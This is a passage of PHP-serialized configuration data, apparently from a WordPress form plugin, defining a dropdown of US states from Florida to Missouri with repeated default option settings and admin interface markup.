dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:16;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Iowa\";s:5:\"value\";s:2:\"IA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:17;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Kansas\";s:5:\"value\";s:2:\"KS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:18;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Kentucky\";s:5:\"value\";s:2:\"KY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:19;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Louisiana\";s:5:\"value\";s:2:\"LA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:20;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Maine\";s:5:\"value\";s:2:\"ME\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:21;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Maryland\";s:5:\"value\";s:2:\"MD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:22;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"Massachusetts\";s:5:\"value\";s:2:\"MA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:23;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Michigan\";s:5:\"value\";s:2:\"MI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:24;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Minnesota\";s:5:\"value\";s:2:\"MN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:25;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:11:\"Mississippi\";s:5:\"value\";s:2:\"MS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:26;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Missouri\";s:5:\"value\";s:2:\"MO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 